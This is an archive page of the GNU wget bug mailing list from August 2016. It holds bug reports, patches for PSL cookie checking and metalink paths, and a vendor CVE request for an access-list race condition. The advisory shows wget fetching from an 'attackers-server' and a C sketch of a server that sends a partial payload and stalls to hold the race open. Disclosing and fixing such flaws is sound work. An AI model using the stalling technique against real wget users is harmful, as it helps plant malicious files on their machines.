[Bug-wget] Additional ideas for wget

2016-08-11 Thread Dale R. Worley
(1) The description of the options that limit recursion needs to be
written better so that it is clear how various combinations of options
interact.

(2) I'd like to be able to make wget annotate each page with the URL
from which it was obtained, so that if I later look at the file, I know
its origin.  With HTML files, it seems like it would be workable to
append to each file an HTML comment such as "\n<!-- fetched from URL -->\n".
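
A minimal sketch of how that could look (a hypothetical helper, not
existing wget code; it assumes the final URL and the local file name
are both at hand):

  /* Hypothetical sketch only.  Append an HTML comment recording the
     origin URL to a file wget has just saved. */
  #include <stdio.h>

  static void
  annotate_origin (const char *file, const char *url)
  {
    FILE *fp = fopen (file, "ab");
    if (!fp)
      return;
    fprintf (fp, "\n<!-- fetched from %s -->\n", url);
    fclose (fp);
  }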

Comments?

Dale



[Bug-wget] Recursion problem with wget

2016-08-11 Thread Dale R. Worley
In regard to my problem, http://savannah.gnu.org/bugs/?48708

The behavior stems from (what seems to me to be) an oddity in how wget
handles recursion.  If a page is fetched from a URL and that fetch
involves no HTTP redirection, the links embedded in the page are tested
against the recursion criteria to see if they should be fetched.  But
if the fetch does involve redirection, the page is still retrieved;
however, if the final URL of the redirection chain does not itself pass
the recursion criteria, the links in the page are never considered,
even if they pass the recursion criteria themselves.

My preferred behavior is that all pages that are retrieved are scanned
for embedded links in any case.

The behavior can be "corrected" straightforwardly:

diff --git a/src/recur.c b/src/recur.c
index 2b17e72..91cc585 100644
--- a/src/recur.c
+++ b/src/recur.c
@@ -360,6 +361,7 @@ retrieve_tree (struct url *start_url_parsed, struct iri *pi)
             {
               reject_reason r = descend_redirect (redirected, url_parsed,
                                                   depth, start_url_parsed,
                                                   blacklist, i);
+              r = WG_RR_SUCCESS;
               if (r == WG_RR_SUCCESS)
                 {
                   /* Make sure that the old pre-redirect form gets

This, of course, isn't the proper and final fix.

It seems to me that making this change in the code would alter its
behavior enough that we would have to worry about backward
compatibility.  Ideally, I'd like my preferred behavior to become the
new default, with an option to restore the previous behavior.  But it
might be necessary to do the opposite and gate the new behavior behind
an option, to avoid disruption.
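
For illustration, a minimal sketch of the opt-in variant; the option
name opt.scan_redirected is invented here, it is not an existing wget
option:

  /* Sketch only -- opt.scan_redirected is hypothetical. */
  reject_reason r = descend_redirect (redirected, url_parsed,
                                      depth, start_url_parsed,
                                      blacklist, i);
  if (r != WG_RR_SUCCESS && opt.scan_redirected)
    r = WG_RR_SUCCESS;      /* scan the page for links anyway */
  if (r == WG_RR_SUCCESS)
    ...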

Interestingly, "make check" *succeeds* with the above code change, so
the test suite is *not* testing for this behavior.

Comments?

Dale



[Bug-wget] CVE Request - Gnu Wget 1.17 - Design Error Vulnerability

2016-08-11 Thread Misra, Deapesh
Hi,

--
- Background -
--

Here at iDefense, Verisign Inc, we have a Vulnerability Contributor Program 
(VCP) where we buy vulnerabilities. 

Recently, security researcher Dawid Golunski sold us an interesting 
vulnerability within Wget. We asked Red Hat (secalert at redhat dot com) if 
they would help us with the co-ordination (patching, disclosure, etc) of this 
vulnerability. Once they graciously accepted, we discussed the vulnerability 
with them. After their initial triage, Red Hat recommended that we publicly 
post the details of this vulnerability to this mailing list for further 
discussion and hence this email.

--
- Title -
--

Wget Recursive Download Accesslist Race Condition Vulnerability


-  Vulnerable Version  -


GNU Wget <= 1.17   Race Condition / Access-list Bypass

---
-  Vulnerability  -
---

When wget is used in recursive/mirroring mode, according to the manual it can 
take the following access list options:

"Recursive Accept/Reject Options:
  -A acclist --accept acclist
  -R rejlist --reject rejlist

Specify comma-separated lists of file name suffixes or patterns to accept or 
reject. Note that if any of the wildcard characters, *, ?, [ or ], appear in an 
element of acclist or rejlist, it will be treated as a pattern, rather than a 
suffix."

These can for example be used to only download JPG images. 
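
For instance, to mirror only the JPG images from a site (example.com is
a placeholder):

  wget -r -nH -A '*.jpg' http://example.com/gallery/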

The vulnerability surfaces when wget is used to download a single file
with a recursive option (-r / -m) and an access list (-A): wget only
applies the list at the end of the download process.

This can be observed in the output below:

# wget -r -nH -A '*.jpg' http://attackers-server/test.php
Resolving attackers-server... 192.168.57.1
Connecting to attackers-server|192.168.57.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: 'test.php'

15:05:46 (27.3 B/s) - 'test.php' saved [52]

Removing test.php since it should be rejected.

FINISHED


Although the file does get deleted in the end, this creates a race
condition: an attacker who has control over the URL can slow down the
download process so that he has a chance to make use of the malicious
file before it gets deleted.


It is very easy for an attacker to win this race, as the file only gets
deleted after the HTTP connection is terminated.  He can therefore keep
the connection open as long as necessary to make use of the uploaded
file.  Below is a proof-of-concept exploit that demonstrates this
technique.


--
-  Proof of Concept  -
--

< REDACTED BY iDefense FOR THE TIME BEING >
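
In the meantime, purely to make the "hold the connection open"
mechanics concrete -- this sketch is NOT the redacted PoC; the port and
payload are made up -- a server could send part of the promised body
and then stall:

  /* Illustration only: sends less than the advertised Content-Length,
     then sleeps, so the partially written file stays on the client's
     disk for as long as the connection stays open. */
  #include <stdio.h>
  #include <string.h>
  #include <unistd.h>
  #include <arpa/inet.h>
  #include <netinet/in.h>
  #include <sys/socket.h>

  int
  main (void)
  {
    int srv = socket (AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in addr = { 0 };

    addr.sin_family = AF_INET;
    addr.sin_port = htons (8080);
    addr.sin_addr.s_addr = htonl (INADDR_ANY);
    bind (srv, (struct sockaddr *) &addr, sizeof addr);
    listen (srv, 1);

    int conn = accept (srv, NULL, NULL);
    const char *hdr = "HTTP/1.1 200 OK\r\n"
                      "Content-Type: text/plain\r\n"
                      "Content-Length: 1000\r\n\r\n";
    const char *body = "partial malicious payload";

    write (conn, hdr, strlen (hdr));
    write (conn, body, strlen (body));   /* far less than 1000 bytes */
    sleep (3600);                        /* hold the race window open */
    close (conn);
    close (srv);
    return 0;
  }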

---
-  Discussion  -
---

From the wget manual:

> Finally, it's worth noting that the accept/reject lists are matched twice 
> against downloaded files: once against the URL's filename portion, to 
> determine if the file should be downloaded in the first place; then, after it 
> has been accepted and successfully downloaded, the local file's name is also 
> checked against the accept/reject lists to see if it should be removed. The 
> rationale was that, since '.htm' and '.html' files are always downloaded 
> regardless of accept/reject rules, they should be removed after being 
> downloaded and scanned for links, if they did match the accept/reject lists. 
> However, this can lead to unexpected results, since the local filenames can 
> differ from the original URL filenames in the following ways, all of which 
> can change whether an accept/reject rule matches: 


and from the source code, in file recur.c:

      if (file
          && (opt.delete_after
              || opt.spider /* opt.recursive is implicitely true */
              || !acceptable (file)))
        {
          /* Either --delete-after was specified, or we loaded this
             (otherwise unneeded because of --spider or rejected by -R)
             HTML file just to harvest its hyperlinks -- in either case,
             delete the local file. */
          DEBUGP (("Removing file due to %s in recursive_retrieve():\n",
                   opt.delete_after ? "--delete-after" :
                   (opt.spider ? "--spider" :
                    "recursive rejection criteria")));
          logprintf (LOG_VERBOSE,
                     (opt.delete_after || opt.spider
                      ? _("Removing %s.\n")
                      : _("Removing %s since it should be rejected.\n")),
                     file);
          if (unlink (file))
            logprintf (LOG_NOTQUIET, "unlink: %s\n", strerror (errno));
          logputs (LOG_VERBOSE, "\n");
          register_delete_file (file);
        }


it is evident that the accept/reject rule is applied only after the
file has been fully downloaded, at which point the rejected file is
removed from disk.
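
One conceivable direction for a fix, sketched here under stated
assumptions (download_to() is a hypothetical helper; acceptable(),
aprintf() and xfree() are existing wget functions): fetch into a
temporary name and only expose the file under its final name once it
passes the accept/reject lists.

  /* Sketch only -- download_to() is hypothetical. */
  char *tmp = aprintf ("%s.tmp", file);
  if (download_to (url, tmp) == RETROK)
    {
      if (acceptable (file))
        rename (tmp, file);       /* passes the lists: keep it */
      else
        unlink (tmp);             /* never visible under 'file' */
    }
  xfree (tmp);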

[Bug-wget] [PATCH] Improve PSL cookie checking

2016-08-11 Thread Tim Rühsen
Whenever an HTTP server sends cookies, we have to check them for
validity before we accept them. The Mozilla Public Suffix List (PSL[0])
provides a set of rules that allows detection of some forms of domain
misuse (which would allow privacy leaking of cookies, e.g. leaks of
login information).

Here is a patch that allows Wget to automatically load the latest PSL,
if provided by a distribution/package.
Using the PSL in DAFSA[1] format is recommended - as Debian provides in
its latest 'publicsuffix' package. A plain-text PSL still works, but
needs a fair amount of parsing and processing, while the DAFSA format
doesn't (just a read and it is ready to use).
Libpsl[2] 0.14+ provides a tool to compile a plain-text PSL into DAFSA
format.

I chose a configure option to allow package maintainers to set a
default PSL file at build time. If it can't be read, the code falls
back to the built-in data of libpsl.
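
For example (psl-make-dafsa is the tool shipped with libpsl; the Debian
path below is given as an assumption, adjust to your distribution):

  psl-make-dafsa public_suffix_list.dat public_suffix_list.dafsa
  ./configure --with-psl-file=/usr/share/publicsuffix/public_suffix_list.dafsa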

Please review and comment.

Regards, Tim

[0] https://publicsuffix.org/
[1] https://en.wikipedia.org/wiki/Deterministic_acyclic_finite_state_automaton
[2] https://github.com/rockdaboot/libpsl
From 11e69c7c8c56efd075d492d0b0e977b16a83c64e Mon Sep 17 00:00:00 2001
From: Tim Rühsen
Date: Thu, 11 Aug 2016 15:16:24 +0200
Subject: [PATCH] Improve PSL cookie checking

* configure.ac: Add --with-psl-file to set a PSL file
* src/cookies.c (check_domain_match): Load PSL_FILE with
  fallback to built-in data.

This change allows package maintainers to make Wget use the latest
PSL (DAFSA or plain text), without updating libpsl itself.

E.g. Debian now comes with a DAFSA binary within the 'publicsuffix'
package which allows very fast loading (no parsing or processing needed).
---
 configure.ac  |  7 ++-
 src/cookies.c | 43 ++-
 2 files changed, 44 insertions(+), 6 deletions(-)

diff --git a/configure.ac b/configure.ac
index cce20c6..20cdbd2 100644
--- a/configure.ac
+++ b/configure.ac
@@ -329,6 +329,11 @@ AS_IF([test "x$with_libpsl" != xno], [
   ])
 ])

+# Check for custom PSL file
+AC_ARG_WITH(psl-file,
+  AC_HELP_STRING([--with-psl-file=[PATH]], [path to PSL file (plain text or DAFSA)]),
+  PSL_FILE=$withval AC_DEFINE_UNQUOTED([PSL_FILE], ["$PSL_FILE"], [path to PSL file (plain text or DAFSA)]))
+
 AS_IF([test x"$with_zlib" != xno], [
   with_zlib=yes
   PKG_CHECK_MODULES([ZLIB], zlib, [
@@ -823,7 +828,7 @@ AC_MSG_NOTICE([Summary of build options:
   Libs:  $LIBS
   SSL:   $with_ssl
   Zlib:  $with_zlib
-  PSL:   $with_libpsl
+  PSL:   $with_libpsl $PSL_FILE
   Digest:$ENABLE_DIGEST
   NTLM:  $ENABLE_NTLM
   OPIE:  $ENABLE_OPIE
diff --git a/src/cookies.c b/src/cookies.c
index 767b284..d45f4ef 100644
--- a/src/cookies.c
+++ b/src/cookies.c
@@ -526,19 +526,52 @@ check_domain_match (const char *cookie_domain, const char *host)
 {

 #ifdef HAVE_LIBPSL
+  static int init_psl;
+  static const psl_ctx_t *psl;
+
   char *cookie_domain_lower = NULL;
   char *host_lower = NULL;
-  const psl_ctx_t *psl;
   int is_acceptable;
 
   DEBUGP (("cdm: 1"));
-  if (!(psl = psl_builtin()))
+  if (!init_psl)
     {
-      DEBUGP (("\nlibpsl not built with a public suffix list. "
-               "Falling back to simple heuristics.\n"));
-      goto no_psl;
+      init_psl = 1;
+
+#ifdef PSL_FILE
+      /* If PSL_FILE is a DAFSA file, loading is very fast */
+      if ((psl = psl_load_file (PSL_FILE)))
+        goto have_psl;
+
+      DEBUGP (("\nPSL: %s not found or not readable. "
+               "Falling back to built-in data.\n", quote (PSL_FILE)));
+#endif
+
+      if ((psl = psl_builtin ()) && !psl_builtin_outdated ())
+        goto have_psl;
+
+      DEBUGP (("\nPSL: built-in data outdated. "
+               "Trying to load data from %s.\n",
+               quote (psl_builtin_filename ())));
+
+      if ((psl = psl_load_file (psl_builtin_filename ())))
+        goto have_psl;
+
+      DEBUGP (("\nPSL: %s not found or not readable. "
+               "Falling back to built-in data.\n",
+               quote (psl_builtin_filename ())));
+
+      if (!(psl = psl_builtin ()))
+        {
+          DEBUGP (("\nPSL: libpsl not built with a public suffix list. "
+                   "Falling back to simple heuristics.\n"));
+          goto no_psl;
+        }
     }
+  else if (!psl)
+    goto no_psl;
 
+have_psl:
   if (psl_str_to_utf8lower (cookie_domain, NULL, NULL, &cookie_domain_lower) == PSL_SUCCESS &&
       psl_str_to_utf8lower (host, NULL, NULL, &host_lower) == PSL_SUCCESS)
     {
--
2.8.1





Re: [Bug-wget] [PATCH] Support metalink:file elements with a "path/file" format

2016-08-11 Thread Matthew White
On Wed, 10 Aug 2016 11:30:12 +0200
Tim Rühsen  wrote:

> On Mittwoch, 10. August 2016 06:23:49 CEST Matthew White wrote:
> > On Tue, 09 Aug 2016 21:25:16 +0200
> > 
> > Tim Rühsen  wrote:
> > > On Freitag, 5. August 2016 20:25:06 CEST Matthew White wrote:
> > > > On Thu, 04 Aug 2016 16:47:18 +0200
> > > > 
> > > > Tim Ruehsen  wrote:
> > > > > On Wednesday, August 3, 2016 1:46:56 PM CEST Matthew White wrote:
> > > > > > On Tue, 02 Aug 2016 11:27:08 +0200
> > > > > > 
> > > > > > Tim Ruehsen  wrote:
> > > > > > > On Tuesday, August 2, 2016 10:06:42 AM CEST Matthew White wrote:
> > > > > > > > On Sat, 30 Jul 2016 21:23:56 +0200
> > > > > > > > 
> > > > > > > > Matthew White  wrote:
> > > > > > > > > Hello!
> > > > > > > > > 
> > > > > > > > > I noticed that wget doesn't use the metalink:file element as
> > > > > > > > > the
> > > > > > > > > RFC5854
> > > > > > > > > suggests.
> > > > > > > > > 
> > > > > > > > > https://tools.ietf.org/html/rfc5854#section-4.1.2.1
> > > > > > > > > 
> > > > > > > > > The RFC5854 specifies that the metalink:file could have a
> > > > > > > > > "path/file"
> > > > > > > > > format. In this case wget should create the "path" tree and
> > > > > > > > > save
> > > > > > > > > the
> > > > > > > > > file
> > > > > > > > > as "path/file", but it doesn't. Instead wget saves the file in
> > > > > > > > > the
> > > > > > > > > working directory.
> > > > > > > > > 
> > > > > > > > > e.g. <file name="path/file">
> > > > > > > > > 
> > > > > > > > > With this patch wget conforms to the RFC5854.
> > > > > > > > > 
> > > > > > > > > I made this patch working on the following branch:
> > > > > > > > > master (latest 20cac2c5ab3d63aacfba35fb10878a2d490e2377)
> > > > > > > > > git://git.savannah.gnu.org/wget.git
> > > > > > > > > 
> > > > > > > > > Let me know if this helps.
> > > > > > > > 
> > > > > > > > Hi,
> > > > > > > > 
> > > > > > > > After the suggestions of Tim, I fixed the patch (nice! fix the
> > > > > > > > fix...).
> > > > > > > > So,
> > > > > > > > scratch the previous patch and use this one instead.
> > > > > > > > 
> > > > > > > > The function concat_strings() replaces the combination of
> > > > > > > > malloc(),
> > > > > > > > strlen(), and strcpy(). (Thanks Tim.)
> > > > > > > 
> > > > > > > In this special case (just one string to clone), please use
> > > > > > > xstrdup().
> > > > > > > That is much less overhead.
> > > > > > > 
> > > > > > > > The description now follows the style of the other patches.
> > > > > > > > (Thanks
> > > > > > > > again
> > > > > > > > Tim!)
> > > > > > > > 
> > > > > > > > You may consider this patch a Bugfix:
> > > > > > > > * src/utils.c (unique_create, fopen_excl): cannot create a
> > > > > > > > directory
> > > > > > > > tree
> > > > > > > > like "path/file".
> > > > > > > > 
> > > > > > > > The problem is that fopen_excl() doesn't create non-existing
> > > > > > > > directories.
> > > > > > > > What do you suggest?
> > > > > > > 
> > > > > > > IMO, saving metalink files should work 'as usual and expected'.
> > > > > > > That
> > > > > > > means, all the directory options should apply (see man wget /
> > > > > > > Directory
> > > > > > > Options). We also have to deal with 'escaping' file name sequences
> > > > > > > like
> > > > > > > ../ etc.
> > > > > > > Not to forget character set conversions.
> > > > > > > 
> > > > > > > What about cases where you download https://myserver/file.tgz, and
> > > > > > > in
> > > > > > > the
> > > > > > > metalink file 'name' is set to 'xyz.doc' ? IMO, we should keep
> > > > > > > file.tgz,
> > > > > > > except the user stated --trust-server-names.
> > > > > > > 
> > > > > > > Maybe we should set up a metalink document where we define how
> > > > > > > everything
> > > > > > > should work including corner cases. Next step would be to set up
> > > > > > > appropriate tests and fix the wget metalink code to survive the
> > > > > > > tests.
> > > > > > > 
> > > > > > > > Can we make this patch obsolete?
> > > > > > > 
> > > > > > > Basically yes.
> > > > > > > But we see, there is still much to do around metalink ... but most
> > > > > > > of
> > > > > > > the
> > > > > > > needed code is already there. Most work will be the definition and
> > > > > > > the
> > > > > > > tests.
> > > > > > > 
> > > > > > > Regards, Tim
> > > > > > 
> > > > > > Changed to use xstrdup(), new patch attached.
> > > > > 
> > > > > I already mentioned that taking the metalink filename pulls in a
> > > > > security
> > > > > issue. It might escape the current directory with a relative or
> > > > > absolute
> > > > > path.
> > > > 
> > > > Actually, wget aborts if something like "../path/file" is found as
> > > > metalink:file name (see attached document as patch). The same goes for
> > > > "./path/file" and "/path/file".
> > > > 
> > > > > You might just take the file name without path, but only if the
> > > > > option
> > > > > --